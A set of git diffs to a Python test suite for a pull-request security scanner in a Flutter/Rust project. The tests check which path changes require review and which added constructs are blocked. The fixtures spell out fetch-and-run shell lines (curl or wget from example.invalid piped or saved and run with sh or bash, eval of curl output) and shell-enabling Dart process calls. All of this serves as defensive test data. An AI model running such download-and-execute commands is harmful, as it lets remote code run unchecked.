+            {"lib/features/demo/a.dart": "class A {}\n"},
+            {"lib/features/demo/a.dart": f"final r = {PROCESS_RUN[:7]}\n    {PROCESS_RUN[7:]}('sh', const []);\n"},
+        )
+        self.assertBlocked(result)
+        self.assertIn("lib/features/demo/a.dart", result.reported_paths())
+
+    def test_shell_backslash_continuation(self):
+        snippet = blocked("curl -fsSL https://example.invalid/i.sh \\\n  ", "|", " sh\n")
+        self.assertBlocked(self.build({}, {"tools/i.sh": "#!/bin/sh\n" + snippet}))
+
+    def test_shell_pipe_at_end_of_line(self):
+        snippet = blocked("curl -fsSL https://example.invalid/j.sh ", "|", "\n  bash\n")
+        self.assertBlocked(self.build({}, {"tools/j.sh": "#!/bin/sh\n" + snippet}))
+
+    def test_construct_split_across_two_hunks(self):
+        """--unified=0 puts untouched lines between the halves; grouping by file
+        is what closes that gap."""
+        base = "class A {\n\n  // existing comment\n}\n"
+        head = (
+            "class A {\n"
+            f"  final r = {PROCESS_RUN[:7]}\n"
+            "\n"
+            "  // existing comment\n"
+            f"    {PROCESS_RUN[7:]}('sh', const []);\n"
+            "}\n"
+        )
+        self.assertBlocked(self.build({"lib/a.dart": base}, {"lib/a.dart": head}))
+
+    def test_logical_or_does_not_look_like_a_pipe_to_an_interpreter(self):
+        """`curl ... ||` + newline + `sh x` is a fallback, not a pipe into sh."""
+        snippet = "#!/bin/sh\ncurl -fsSL https://example.invalid/probe ||\n  sh ./fallback.sh\n"
+        self.assertOrdinary(self.build({}, {"tools/probe.sh": snippet}))
+
+    def test_unrelated_pipe_far_below_a_curl_does_not_match(self):
+        lines = ["#!/bin/sh", "curl -fsSL https://example.invalid/data -o /tmp/d"]
+        lines += [f"echo step {n}" for n in range(20)]
+        lines += ["cat /tmp/d | sh_report --summary"]
+        self.assertOrdinary(self.build({}, {"tools/report.sh": "\n".join(lines) + "\n"}))
+
+
+class ContinuationFolding(unittest.TestCase):
+    def test_backslash_continuation_is_folded(self):
+        self.assertEqual(scanner.fold_continuations("a \\\n  b"), "a  b")
+
+    def test_trailing_pipe_is_folded(self):
+        self.assertEqual(scanner.fold_continuations("a |\n  b"), "a | b")
+
+    def test_ordinary_newlines_are_preserved(self):
+        self.assertEqual(scanner.fold_continuations("a\nb"), "a\nb")
+
+    def test_additions_are_grouped_per_file_in_order(self):
+        grouped = scanner.group_additions(
+            [("lib/a.dart", "one"), ("lib/b.dart", "x"), ("lib/a.dart", "two")]
+        )
+        self.assertEqual(grouped, [("lib/a.dart", "one\ntwo"), ("lib/b.dart", "x")])
+
+
 class FailClosed(ScannerTestCase):
     def test_unknown_base_revision_fails_closed(self):
         tmp = Path(tempfile.mkdtemp())
@@ -683,17 +745,23 @@ class GuardSelfSafety(unittest.TestCase):
         SCANNER,
         WORKFLOW,
         ROOT / ".github" / "workflows" / "pr-security-review-tests.yml",
+        ROOT / "docs" / "pr-security-guard.md",
         Path(__file__).resolve(),
     )
 
     def test_guard_sources_do_not_trip_their_own_blocked_rules(self):
+        """Scanned exactly as the guard would scan them: whole file, one block."""
         for source in self.SOURCES:
-            for number, line in enumerate(source.read_text(encoding="utf-8").splitlines(), 1):
-                for pattern, reason in scanner.BLOCKED_ADDITION_RULES:
-                    self.assertIsNone(
-                        pattern.search(line),
-                        f"{source.relative_to(ROOT)}:{number} trips the {reason!r} rule: {line.strip()}",
-                    )
+            text = source.read_text(encoding="utf-8")
+            block = scanner.fold_continuations(text)
+            for pattern, reason in scanner.BLOCKED_ADDITION_RULES:
+                match = pattern.search(block)
+                self.assertIsNone(
+                    match,
+                    f"{source.relative_to(ROOT)} trips the {reason!r} rule at "
+                    f"line {block[: match.start()].count(chr(10)) + 1 if match else 0}: "
+                    f"{match.group(0)!r}" if match else "",
+                )
 
     def test_assembled_fixtures_are_the_literals_they_claim_to_be(self):
         """The split fixtures must still be the exact patterns under test."""

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -330,6 +330,23 @@ class AutomationAndToolchainPaths(ScannerTestCase):
         self.assertOrdinary(self.build({}, {".gitignore": "build/\n"}))
 
 
+class AndroidSecurityPolicyPaths(ScannerTestCase):
+    """res/xml carries the app's security and privacy policy."""
+
+    BASE = "android/app/src/main/res/xml/"
+
+    def test_network_security_config(self):
+        """Trust anchors and cleartext policy live here."""
+        path = self.BASE + "network_security_config.xml"
+        self.assertSensitive(self.build({path: "<a/>\n"}, {path: "<b/>\n"}))
+
+    def test_backup_and_extraction_rules(self):
+        for name in ("backup_rules.xml", "data_extraction_rules.xml"):
+            with self.subTest(name):
+                path = self.BASE + name
+                self.assertSensitive(self.build({path: "<a/>\n"}, {path: "<b/>\n"}))
+
+
 class NativeAndCargoPaths(ScannerTestCase):
     """CI compiles native/ and runs the Rust core from it."""
 
@@ -641,6 +658,14 @@ class DownloadThenExecute(ScannerTestCase):
     def test_download_without_execution_is_not_blocked(self):
         script = f"#!/bin/sh\nwget -q {self.URL}/archive.tar.gz\ntar xf archive.tar.gz\n"
         self.assertOrdinary(self.build({}, {"packaging/bf.sh": script}))
+
+    def test_executed_file_only_sharing_a_prefix_is_not_blocked(self):
+        """`/tmp/data` and `/tmp/data-cleanup.sh` are different files."""
+        script = (
+            "#!/bin/sh\n"
+            f"curl -fsSL {self.URL} -o /tmp/data && sh /tmp/data-cleanup.sh\n"
+        )
+        self.assertOrdinary(self.build({}, {"packaging/pre.sh": script}))
 
     def test_downloading_data_and_running_an_unrelated_script_is_not_blocked(self):
         """The backreference is what keeps this rule from over-matching."""
@@ -1022,6 +1047,27 @@ class ActivationOfExistingCode(ScannerTestCase):
         base = f"void t() {{\n  {PROCESS_RUN}('x');\n}}\n// tail\n"
         head = f"void t() {{\n  {PROCESS_RUN}('x');\n}}\n// tail edited\n"
         self.assertSensitive(self.build({"lib/t.dart": base}, {"lib/t.dart": head}))
+
+
+class SensitiveActivation(ScannerTestCase):
+    """Uncommenting existing sensitive code is caught; editing beside it is not."""
+
+    def test_uncommenting_sensitive_code_requires_review(self):
+        base = "class P {\n/*\n  final c = HttpClient();\n*/\n}\n"
+        head = "class P {\n  final c = HttpClient();\n}\n"
+        result = self.build({"lib/ui/panel.dart": base}, {"lib/ui/panel.dart": head})
+        self.assertSensitive(result)
+        self.assertIn("deletion may activate existing", result.report)
+
+    def test_editing_beside_sensitive_code_stays_ordinary(self):
+        """The load-bearing case: 356 files hold a sensitive match.
+
+        If an edit near any of them demanded review, the ordinary UI/tests/docs
+        PR would always be a reviewed PR — the one thing the guard must not do.
+        """
+        base = "class W {\n  final c = HttpClient();\n}\n// tail\n"
+        head = "class W {\n  final c = HttpClient();\n}\n// tail edited\n"
+        self.assertOrdinary(self.build({"lib/ui/w.dart": base}, {"lib/ui/w.dart": head}))
 
 
 class DeletedFiles(ScannerTestCase):

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -617,11 +617,16 @@ class ConstructCompletedFromContext(ScannerTestCase):
         self.assertBlocked(result)
         self.assertIn("lib/r.dart", result.reported_paths())
 
-    def test_grandfathered_construct_on_an_untouched_line_is_not_reported(self):
-        """Editing elsewhere in a file that already contains a blocked call."""
+    def test_grandfathered_construct_is_reviewed_but_never_blocked(self):
+        """Editing elsewhere in a file that already contains a blocked call.
+
+        The construct was not introduced here, so it must not hard-block the
+        PR — an approval has to remain possible. It is still surfaced, because
+        an edit elsewhere in the file can be what made it reachable.
+        """
         base = f"void t() {{\n  {PROCESS_RUN}('x');\n}}\n// tail\n"
         head = f"void t() {{\n  {PROCESS_RUN}('x');\n}}\n// tail edited\n"
-        self.assertOrdinary(self.build({"lib/t.dart": base}, {"lib/t.dart": head}))
+        self.assertSensitive(self.build({"lib/t.dart": base}, {"lib/t.dart": head}))
 
     def test_touching_the_grandfathered_line_itself_is_reported(self):
         base = f"void t() {{\n  {PROCESS_RUN}('x');\n}}\n"
@@ -911,8 +916,8 @@ class TrustedScannerLoader(unittest.TestCase):
         self.assertEqual(loaded, "")
 
 
-class DeletionActivation(ScannerTestCase):
-    """Removing lines can make untouched code live without retyping it."""
+class ActivationOfExistingCode(ScannerTestCase):
+    """A change elsewhere can make untouched code live without retyping it."""
 
     INERT = "class A {\n/*\n  void g() { %s('sh', const []); }\n*/\n}\n"
     LIVE = "class A {\n  void g() { %s('sh', const []); }\n}\n"
@@ -924,7 +929,7 @@ class DeletionActivation(ScannerTestCase):
         )
         self.assertSensitive(result)
         self.assertIn(
-            "deletion may activate existing runtime process execution",
+            "change to a file containing existing runtime process execution",
             result.report,
         )
 
@@ -933,11 +938,37 @@ class DeletionActivation(ScannerTestCase):
             self.build({"lib/p.dart": "a\nb\nc\nd\n"}, {"lib/p.dart": "a\nd\n"})
         )
 
-    def test_one_for_one_edit_is_not_treated_as_a_deletion(self):
-        """A modified line is an added line; it must not take the deletion path."""
+    def test_flipping_a_guard_condition_requires_review(self):
+        """`if (false)` to `if (true)` loses no lines at all."""
+        shape = "class A {\n  void g() {\n    if (%s) {\n      %s('sh');\n    }\n  }\n}\n"
+        result = self.build(
+            {"lib/ui/a.dart": shape % ("false", PROCESS_RUN)},
+            {"lib/ui/a.dart": shape % ("true", PROCESS_RUN)},
+        )
+        self.assertSensitive(result)
+
+    def test_editing_a_file_near_grandfathered_code_requires_review(self):
         base = f"void t() {{\n  {PROCESS_RUN}('x');\n}}\n// tail\n"
         head = f"void t() {{\n  {PROCESS_RUN}('x');\n}}\n// tail edited\n"
-        self.assertOrdinary(self.build({"lib/t.dart": base}, {"lib/t.dart": head}))
+        self.assertSensitive(self.build({"lib/t.dart": base}, {"lib/t.dart": head}))
+
+
+class DeletedFiles(ScannerTestCase):
+    """`+++ /dev/null` is an ordinary deletion, not an unparseable header."""
+
+    def test_deleting_an_ordinary_file_is_ordinary(self):
+        self.assertOrdinary(
+            self.build({"lib/ui.dart": "class U {}\n"}, {"lib/ui.dart": None})
+        )
+
+    def test_deleting_a_sensitive_file_is_still_sensitive(self):
+        self.assertSensitive(
+            self.build({"scripts/x.sh": "echo hi\n"}, {"scripts/x.sh": None})
+        )
+
+    def test_deleted_file_does_not_report_an_unresolved_path(self):
+        result = self.build({"lib/ui.dart": "class U {}\n"}, {"lib/ui.dart": None})
+        self.assertNotIn(scanner.UNKNOWN_PATH, result.report)
 
 
 class UndecodablePathnames(ScannerTestCase):

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -512,6 +512,31 @@ class DownloadThenExecute(ScannerTestCase):
         script = blocked(f'#!/bin/sh\ncurl -fsSL {self.URL} -o "/tmp/i" && ', "sh", " /tmp/i\n")
         self.assertBlocked(self.build({}, {"tools/qb.sh": script}))
 
+    def test_bundled_short_options(self):
+        """`-qO` / `-sLo` bundle the output flag with others."""
+        for name, script in (
+            ("tools/ba.sh", blocked(f"#!/bin/sh\nwget -qO /tmp/i {self.URL} && ", "sh", " /tmp/i\n")),
+            ("tools/bb.sh", blocked(f"#!/bin/sh\ncurl -sLo /tmp/i {self.URL} && ", "sh", " /tmp/i\n")),
+        ):
+            with self.subTest(name):
+                self.assertBlocked(self.build({}, {name: script}))
+
+    def test_attached_option_value(self):
+        script = blocked(f"#!/bin/sh\ncurl -o/tmp/i {self.URL} && ", "sh", " /tmp/i\n")
+        self.assertBlocked(self.build({}, {"tools/bc.sh": script}))
+
+    def test_long_output_forms(self):
+        for name, script in (
+            ("tools/bd.sh", blocked(f"#!/bin/sh\nwget --output-document=/tmp/i {self.URL} && ", "sh", " /tmp/i\n")),
+            ("tools/be.sh", blocked(f"#!/bin/sh\ncurl --output /tmp/i {self.URL} && ", "bash", " /tmp/i\n")),
+        ):
+            with self.subTest(name):
+                self.assertBlocked(self.build({}, {name: script}))
+
+    def test_download_without_execution_is_not_blocked(self):
+        script = f"#!/bin/sh\nwget -q {self.URL}/archive.tar.gz\ntar xf archive.tar.gz\n"
+        self.assertOrdinary(self.build({}, {"tools/bf.sh": script}))
+
     def test_downloading_data_and_running_an_unrelated_script_is_not_blocked(self):
         """The backreference is what keeps this rule from over-matching."""
         script = (

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -307,6 +307,29 @@ class SensitiveSurfaces(ScannerTestCase):
         self.assertSensitive(result)
 
 
+class AutomationAndToolchainPaths(ScannerTestCase):
+    """CI executes more than scripts/, and consumes pinned toolchains."""
+
+    def test_tool_and_tools_trees_are_automation(self):
+        for path in ("tool/version_from_tag.dart", "tools/large_library/gen.py"):
+            with self.subTest(path):
+                self.assertSensitive(self.build({}, {path: "// new\n"}))
+
+    def test_gradle_wrapper_is_sensitive(self):
+        """distributionUrl chooses where Gradle itself is downloaded from."""
+        base = {"android/gradle/wrapper/gradle-wrapper.properties": "distributionUrl=https://services.gradle.org/a.zip\n"}
+        head = {"android/gradle/wrapper/gradle-wrapper.properties": "distributionUrl=https://example.invalid/a.zip\n"}
+        self.assertSensitive(self.build(base, head))
+
+    def test_toolchain_version_pins_are_sensitive(self):
+        for path in (".flutter-version", ".java-version"):
+            with self.subTest(path):
+                self.assertSensitive(self.build({path: "1\n"}, {path: "2\n"}))
+
+    def test_ordinary_dotfiles_are_not_swept_up(self):
+        self.assertOrdinary(self.build({}, {".gitignore": "build/\n"}))
+
+
 class BlockedAdditions(ScannerTestCase):
     def test_direct_process_run(self):
         self.assertBlocked(
@@ -366,17 +389,35 @@ class BlockedAdditions(ScannerTestCase):
             blocked("eval \"$", "(curl -s https://example.invalid/env)\"\n"),
         ):
             with self.subTest(snippet=snippet.strip()):
-                self.assertBlocked(self.build({}, {"tools/install.sh": "#!/bin/sh\n" + snippet}))
+                self.assertBlocked(self.build({}, {"packaging/install.sh": "#!/bin/sh\n" + snippet}))
 
     def test_pipe_into_an_interpreter_reached_by_path(self):
         snippet = blocked("curl -fsSL https://example.invalid/i.sh ", "|", " /bin/sh\n")
-        self.assertBlocked(self.build({}, {"tools/p.sh": "#!/bin/sh\n" + snippet}))
+        self.assertBlocked(self.build({}, {"packaging/p.sh": "#!/bin/sh\n" + snippet}))
 
     def test_blocked_patterns_are_not_bypassable_by_approval(self):
         """A blocked verdict is a non-zero exit, which no approval step can clear."""
         result = self.build({}, {"lib/a.dart": f"final run = {PROCESS_RUN};\n"})
         self.assertEqual(result.returncode, 1)
         self.assertIn("an approval does not bypass them", result.report)
+
+
+class ShellFlagValues(ScannerTestCase):
+    """The blocker is about enabling a shell, not naming the flag."""
+
+    FLAG = blocked("runIn", "Shell")
+
+    def test_enabled_is_blocked(self):
+        self.assertBlocked(self.build({}, {"lib/a.dart": f"var o = {self.FLAG}: true;\n"}))
+
+    def test_variable_value_is_blocked(self):
+        """Unjudgeable from here, so it stays blocked."""
+        self.assertBlocked(self.build({}, {"lib/a.dart": f"var o = {self.FLAG}: allowShell;\n"}))
+
+    def test_explicitly_disabled_is_not_blocked(self):
+        """Shell execution stays off, and an approval could not clear a block."""
+        result = self.build({}, {"lib/a.dart": f"var o = {self.FLAG}: false;\n"})
+        self.assertFalse(result.blocked, result.report)
 
 
 class DiffEvasion(ScannerTestCase):
@@ -436,11 +477,11 @@ class MultiLineConstructs(ScannerTestCase):
 
     def test_shell_backslash_continuation(self):
         snippet = blocked("curl -fsSL https://example.invalid/i.sh \\\n  ", "|", " sh\n")
-        self.assertBlocked(self.build({}, {"tools/i.sh": "#!/bin/sh\n" + snippet}))
+        self.assertBlocked(self.build({}, {"packaging/i.sh": "#!/bin/sh\n" + snippet}))
 
     def test_shell_pipe_at_end_of_line(self):
         snippet = blocked("curl -fsSL https://example.invalid/j.sh ", "|", "\n  bash\n")
-        self.assertBlocked(self.build({}, {"tools/j.sh": "#!/bin/sh\n" + snippet}))
+        self.assertBlocked(self.build({}, {"packaging/j.sh": "#!/bin/sh\n" + snippet}))
 
     def test_construct_split_across_two_hunks(self):
         """--unified=0 puts untouched lines between the halves; grouping by file
@@ -459,13 +500,13 @@ class MultiLineConstructs(ScannerTestCase):
     def test_logical_or_does_not_look_like_a_pipe_to_an_interpreter(self):
         """`curl ... ||` + newline + `sh x` is a fallback, not a pipe into sh."""
         snippet = "#!/bin/sh\ncurl -fsSL https://example.invalid/probe ||\n  sh ./fallback.sh\n"
-        self.assertOrdinary(self.build({}, {"tools/probe.sh": snippet}))
+        self.assertOrdinary(self.build({}, {"packaging/probe.sh": snippet}))
 
     def test_unrelated_pipe_far_below_a_curl_does_not_match(self):
         lines = ["#!/bin/sh", "curl -fsSL https://example.invalid/data -o /tmp/d"]
         lines += [f"echo step {n}" for n in range(20)]
         lines += ["cat /tmp/d | sh_report --summary"]
-        self.assertOrdinary(self.build({}, {"tools/report.sh": "\n".join(lines) + "\n"}))
+        self.assertOrdinary(self.build({}, {"packaging/report.sh": "\n".join(lines) + "\n"}))
 
 
 class CommentSeparatedTokens(ScannerTestCase):
@@ -503,32 +544,32 @@ class DownloadThenExecute(ScannerTestCase):
 
     def test_and_chained_on_one_line(self):
         script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/i && ", "sh", " /tmp/i\n")
-        self.assertBlocked(self.build({}, {"tools/a.sh": script}))
+        self.assertBlocked(self.build({}, {"packaging/a.sh": script}))
 
     def test_split_across_lines(self):
         script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/j\n", "bash", " /tmp/j\n")
-        self.assertBlocked(self.build({}, {"tools/b.sh": script}))
+        self.assertBlocked(self.build({}, {"packaging/b.sh": script}))
 
     def test_wget_output_flag(self):
         script = blocked(f"#!/bin/sh\nwget -O /tmp/k {self.URL}\n", "bash", " /tmp/k\n")
-        self.assertBlocked(self.build({}, {"tools/c.sh": script}))
+        self.assertBlocked(self.build({}, {"packaging/c.sh": script}))
 
     def test_shell_redirect_to_file(self):
         script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} > /tmp/m; ", "python3", " /tmp/m\n")
-        self.assertBlocked(self.build({}, {"tools/d.sh": script}))
+        self.assertBlocked(self.build({}, {"packaging/d.sh": script}))
 
     def test_chmod_then_direct_execution(self):
         script = f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/n\nchmod +x /tmp/n\n/tmp/n\n"
-        self.assertBlocked(self.build({}, {"tools/e.sh": script}))
+        self.assertBlocked(self.build({}, {"packaging/e.sh": script}))
 
     def test_interpreter_reached_by_path(self):
         """`/bin/sh` is an interpreter; `report.sh` is a filename."""
         script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/p && /bin/", "bash", " /tmp/p\n")
-        self.assertBlocked(self.build({}, {"tools/g.sh": script}))
+        self.assertBlocked(self.build({}, {"packaging/g.sh": script}))
 
     def test_sudo_interpreter(self):
         script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/q && sudo ", "sh", " /tmp/q\n")
-        self.assertBlocked(self.build({}, {"tools/h.sh": script}))
+        self.assertBlocked(self.build({}, {"packaging/h.sh": script}))
 
     def test_downloaded_file_consumed_by_a_non_interpreter_is_not_blocked(self):
         script = (
@@ -536,40 +577,40 @@ class DownloadThenExecute(ScannerTestCase):
             f"curl -fsSL {self.URL}/d.json -o /tmp/d.json\n"
             "jq . /tmp/d.json\n"
         )
-        self.assertOrdinary(self.build({}, {"tools/i.sh": script}))
+        self.assertOrdinary(self.build({}, {"packaging/i.sh": script}))
 
     def test_quoted_execution_target(self):
         script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/i && ", "sh", ' "/tmp/i"\n')
-        self.assertBlocked(self.build({}, {"tools/qa.sh": script}))
+        self.assertBlocked(self.build({}, {"packaging/qa.sh": script}))
 
     def test_quoted_download_target_unquoted_execution(self):
         script = blocked(f'#!/bin/sh\ncurl -fsSL {self.URL} -o "/tmp/i" && ', "sh", " /tmp/i\n")
-        self.assertBlocked(self.build({}, {"tools/qb.sh": script}))
+        self.assertBlocked(self.build({}, {"packaging/qb.sh": script}))
 
     def test_bundled_short_options(self):
         """`-qO` / `-sLo` bundle the output flag with others."""
         for name, script in (
-            ("tools/ba.sh", blocked(f"#!/bin/sh\nwget -qO /tmp/i {self.URL} && ", "sh", " /tmp/i\n")),
-            ("tools/bb.sh", blocked(f"#!/bin/sh\ncurl -sLo /tmp/i {self.URL} && ", "sh", " /tmp/i\n")),
+            ("packaging/ba.sh", blocked(f"#!/bin/sh\nwget -qO /tmp/i {self.URL} && ", "sh", " /tmp/i\n")),
+            ("packaging/bb.sh", blocked(f"#!/bin/sh\ncurl -sLo /tmp/i {self.URL} && ", "sh", " /tmp/i\n")),
         ):
             with self.subTest(name):
                 self.assertBlocked(self.build({}, {name: script}))
 
     def test_attached_option_value(self):
         script = blocked(f"#!/bin/sh\ncurl -o/tmp/i {self.URL} && ", "sh", " /tmp/i\n")
-        self.assertBlocked(self.build({}, {"tools/bc.sh": script}))
+        self.assertBlocked(self.build({}, {"packaging/bc.sh": script}))
 
     def test_long_output_forms(self):
         for name, script in (
-            ("tools/bd.sh", blocked(f"#!/bin/sh\nwget --output-document=/tmp/i {self.URL} && ", "sh", " /tmp/i\n")),
-            ("tools/be.sh", blocked(f"#!/bin/sh\ncurl --output /tmp/i {self.URL} && ", "bash", " /tmp/i\n")),
+            ("packaging/bd.sh", blocked(f"#!/bin/sh\nwget --output-document=/tmp/i {self.URL} && ", "sh", " /tmp/i\n")),
+            ("packaging/be.sh", blocked(f"#!/bin/sh\ncurl --output /tmp/i {self.URL} && ", "bash", " /tmp/i\n")),
         ):
             with self.subTest(name):
                 self.assertBlocked(self.build({}, {name: script}))
 
     def test_download_without_execution_is_not_blocked(self):
         script = f"#!/bin/sh\nwget -q {self.URL}/archive.tar.gz\ntar xf archive.tar.gz\n"
-        self.assertOrdinary(self.build({}, {"tools/bf.sh": script}))
+        self.assertOrdinary(self.build({}, {"packaging/bf.sh": script}))
 
     def test_downloading_data_and_running_an_unrelated_script_is_not_blocked(self):
         """The backreference is what keeps this rule from over-matching."""
@@ -578,7 +619,7 @@ class DownloadThenExecute(ScannerTestCase):
             f"curl -fsSL {self.URL}/catalog.json -o /tmp/catalog.json\n"
             "bash ./scripts/process_catalog.sh /tmp/catalog.json\n"
         )
-        self.assertOrdinary(self.build({}, {"tools/f.sh": script}))
+        self.assertOrdinary(self.build({}, {"packaging/f.sh": script}))
 
 
 class AddedLineMapping(unittest.TestCase):

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -307,6 +307,25 @@ class SensitiveSurfaces(ScannerTestCase):
         self.assertSensitive(result)
 
 
+class GithubDirectoryPaths(ScannerTestCase):
+    """`.github/` is automation by default; only community metadata is exempt."""
+
+    def test_agent_prompt_is_sensitive(self):
+        """flutter-ci-fixer.yml feeds this to an agent with workspace-write."""
+        path = ".github/codex/prompts/fix-flutter-ci.md"
+        self.assertSensitive(self.build({path: "old\n"}, {path: "new\n"}))
+
+    def test_workflows_and_actions_still_sensitive(self):
+        for path in (".github/workflows/ci.yml", ".github/actions/setup-flutter/action.yml"):
+            with self.subTest(path):
+                self.assertSensitive(self.build({path: "a: 1\n"}, {path: "a: 2\n"}))
+
+    def test_community_metadata_stays_ordinary(self):
+        for path in (".github/ISSUE_TEMPLATE/bug_report.yml", ".github/FUNDING.yml"):
+            with self.subTest(path):
+                self.assertOrdinary(self.build({path: "a: 1\n"}, {path: "a: 2\n"}))
+
+
 class AutomationAndToolchainPaths(ScannerTestCase):
     """CI executes more than scripts/, and consumes pinned toolchains."""
 
@@ -477,6 +496,20 @@ class ShellFlagValues(ScannerTestCase):
     def test_variable_value_is_blocked(self):
         """Unjudgeable from here, so it stays blocked."""
         self.assertBlocked(self.build({}, {"lib/a.dart": f"var o = {self.FLAG}: allowShell;\n"}))
+
+    def test_expression_merely_starting_with_false_is_blocked(self):
+        """`false || true` evaluates true; the exemption is for `false` alone."""
+        for name, value in (("lib/x1.dart", "false || true"), ("lib/x2.dart", "false == false")):
+            with self.subTest(value):
+                self.assertBlocked(
+                    self.build({}, {name: f"var o = {self.FLAG}: {value};\n"})
+                )
+
+    def test_disabled_value_at_expression_delimiters(self):
+        for name, tail in (("lib/y1.dart", ","), ("lib/y2.dart", ")"), ("lib/y3.dart", ";")):
+            with self.subTest(tail):
+                result = self.build({}, {name: f"f({self.FLAG}: false{tail}\n"})
+                self.assertFalse(result.blocked, result.report)
 
     def test_explicitly_disabled_is_not_blocked(self):
         """Shell execution stays off, and an approval could not clear a block."""
@@ -705,6 +738,21 @@ class DownloadThenExecute(ScannerTestCase):
                     f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/i && ", spelling, " /tmp/i\n"
                 )
                 self.assertBlocked(self.build({}, {name: script}))
+
+    def test_wrapper_command_before_the_interpreter(self):
+        """`env sh` launches the interpreter just as `sh` does."""
+        for name, wrapper in (
+            ("packaging/w1.sh", "env"),
+            ("packaging/w2.sh", "nohup"),
+            ("packaging/w3.sh", "env FOO=1"),
+        ):
+            with self.subTest(wrapper):
+                script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} | {wrapper} ", "sh", "\n")
+                self.assertBlocked(self.build({}, {name: script}))
+
+    def test_wrapper_before_a_non_interpreter_is_not_blocked(self):
+        script = f"#!/bin/sh\ncurl -s {self.URL} | timeout 5 jq .\n"
+        self.assertOrdinary(self.build({}, {"packaging/w4.sh": script}))
 
     def test_redirect_belonging_to_a_later_command_is_not_blocked(self):
         """The curl never writes /tmp/i; printf does, after a `;`."""

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -144,6 +144,40 @@ class ScannerTestCase(unittest.TestCase):
 
         return self.scan(repo, base_sha, head_sha)
 
+    def build_raw(
+        self, base: dict[bytes, bytes], head: dict[bytes, bytes]
+    ) -> ScanResult:
+        """Like build(), but pathnames are raw bytes rather than str.
+
+        Needed to construct a pathname that is not valid UTF-8, which is not
+        expressible through the str-keyed helper.
+        """
+
+        tmp = Path(tempfile.mkdtemp())
+        self.addCleanup(shutil.rmtree, tmp, True)
+        repo = tmp / "repo"
+        repo.mkdir()
+
+        _git(repo, "init", "-q", "-b", "main", ".")
+        _git(repo, "config", "user.email", "test@example.invalid")
+        _git(repo, "config", "user.name", "Test")
+
+        def write(paths: dict[bytes, bytes]) -> None:
+            for raw, content in paths.items():
+                target = os.path.join(os.fsencode(repo), raw)
+                os.makedirs(os.path.dirname(target), exist_ok=True)
+                with open(target, "wb") as handle:
+                    handle.write(content)
+
+        _write(repo, "README.md", "# fixture\n")
+        write(base)
+        base_sha = _commit(repo, "base")
+
+        write(head)
+        head_sha = _commit(repo, "head")
+
+        return self.scan(repo, base_sha, head_sha)
+
     def scan(self, repo: Path, base_sha: str, head_sha: str) -> ScanResult:
         tmp = Path(tempfile.mkdtemp())
         self.addCleanup(shutil.rmtree, tmp, True)
@@ -875,6 +909,50 @@ class TrustedScannerLoader(unittest.TestCase):
         self.assertEqual(code, 1, log)
         self.assertIn("unavailable", log)
         self.assertEqual(loaded, "")
+
+
+class DeletionActivation(ScannerTestCase):
+    """Removing lines can make untouched code live without retyping it."""
+
+    INERT = "class A {\n/*\n  void g() { %s('sh', const []); }\n*/\n}\n"
+    LIVE = "class A {\n  void g() { %s('sh', const []); }\n}\n"
+
+    def test_uncommenting_an_existing_call_requires_review(self):
+        result = self.build(
+            {"lib/ui/a.dart": self.INERT % PROCESS_RUN},
+            {"lib/ui/a.dart": self.LIVE % PROCESS_RUN},
+        )
+        self.assertSensitive(result)
+        self.assertIn(
+            "deletion may activate existing runtime process execution",
+            result.report,
+        )
+
+    def test_deletion_in_a_file_without_blocked_code_is_ordinary(self):
+        self.assertOrdinary(
+            self.build({"lib/p.dart": "a\nb\nc\nd\n"}, {"lib/p.dart": "a\nd\n"})
+        )
+
+    def test_one_for_one_edit_is_not_treated_as_a_deletion(self):
+        """A modified line is an added line; it must not take the deletion path."""
+        base = f"void t() {{\n  {PROCESS_RUN}('x');\n}}\n// tail\n"
+        head = f"void t() {{\n  {PROCESS_RUN}('x');\n}}\n// tail edited\n"
+        self.assertOrdinary(self.build({"lib/t.dart": base}, {"lib/t.dart": head}))
+
+
+class UndecodablePathnames(ScannerTestCase):
+    """A pathname byte that is not valid UTF-8 must not drop a file."""
+
+    def test_invalid_utf8_pathname_is_still_scanned(self):
+        result = self.build_raw(
+            {},
+            {b"lib/evil\xff.dart": f"void main() {{ {PROCESS_RUN}(1); }}\n".encode()},
+        )
+        self.assertBlocked(result)
+
+    def test_pathname_bytes_round_trip_through_unquoting(self):
+        decoded = scanner.unquote_git_path(r'"lib/evil\377.dart"')
+        self.assertEqual(decoded.encode("utf-8", "surrogateescape"), b"lib/evil\xff.dart")
 
 
 class GuardSelfSafety(unittest.TestCase):

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -330,6 +330,36 @@ class AutomationAndToolchainPaths(ScannerTestCase):
         self.assertOrdinary(self.build({}, {".gitignore": "build/\n"}))
 
 
+class NativeAndCargoPaths(ScannerTestCase):
+    """CI compiles native/ and runs the Rust core from it."""
+
+    def test_cargo_manifest_and_lockfile(self):
+        """A Cargo dependency may carry a build script that runs during CI."""
+        for path in ("native/linthra_core/Cargo.toml", "native/linthra_core/Cargo.lock"):
+            with self.subTest(path):
+                self.assertSensitive(self.build({path: "a = 1\n"}, {path: "a = 2\n"}))
+
+    def test_native_sources(self):
+        for path in (
+            "native/linthra_audio/src/dsp.cpp",
+            "native/linthra_audio/include/linthra_audio/dsp.hpp",
+            "native/linthra_core/src/lib.rs",
+            "linux/runner/main.cc",
+        ):
+            with self.subTest(path):
+                self.assertSensitive(self.build({}, {path: "// new\n"}))
+
+    def test_cmake_build_files(self):
